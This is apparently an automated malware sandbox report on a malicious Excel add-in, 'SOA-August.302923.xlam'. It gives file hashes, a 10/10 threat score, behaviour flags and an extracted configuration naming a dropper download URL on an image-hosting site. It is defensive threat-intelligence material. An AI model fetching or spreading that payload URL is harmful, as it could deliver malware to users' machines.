Overview

overview

10

Static

static

1

SOA-August...3.xlam

windows7-x64

10

SOA-August...3.xlam

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    SOA-August.302923.xlam

  • Size

    632KB

  • Sample

    230921-q8q9fsad53

  • MD5

    11a555aac8b3f7cf6909514059bde8cd

  • SHA1

    fe0d334cc8d8feddb5391495fc4054ed2a29e946

  • SHA256

    85f471e81a30470e108b7cdd81400b3716232d89e855e2484376dae63f91b752

  • SHA512

    3247c58546a64cfe800a88796a56ad4e1ba68889e30231ae7984592b928264ae644ea8a09e8ded5863a14d2ad95e869522f2d050bfefffde93f3dff0448f5780

  • SSDEEP

    12288:KE82x7cuq7Zq8a//+1ZpeQV9D4e9TJWyVnBijuQ2P/IT2Us7PKTgi:DIuaMr//+LpVTJWwngjuXAjUKP

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/614/895/original/rump_vbs.jpg?1695246171
exe.dropper

https://uploaddeimagens.com.br/images/004/614/895/original/rump_vbs.jpg?1695246171

Targets

    • Target

      SOA-August.302923.xlam

    • Size

      632KB

    • MD5

      11a555aac8b3f7cf6909514059bde8cd

    • SHA1

      fe0d334cc8d8feddb5391495fc4054ed2a29e946

    • SHA256

      85f471e81a30470e108b7cdd81400b3716232d89e855e2484376dae63f91b752

    • SHA512

      3247c58546a64cfe800a88796a56ad4e1ba68889e30231ae7984592b928264ae644ea8a09e8ded5863a14d2ad95e869522f2d050bfefffde93f3dff0448f5780

    • SSDEEP

      12288:KE82x7cuq7Zq8a//+1ZpeQV9D4e9TJWyVnBijuQ2P/IT2Us7PKTgi:DIuaMr//+LpVTJWwngjuXAjUKP

    Score
    10/10

    • Blocklisted process makes network request

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks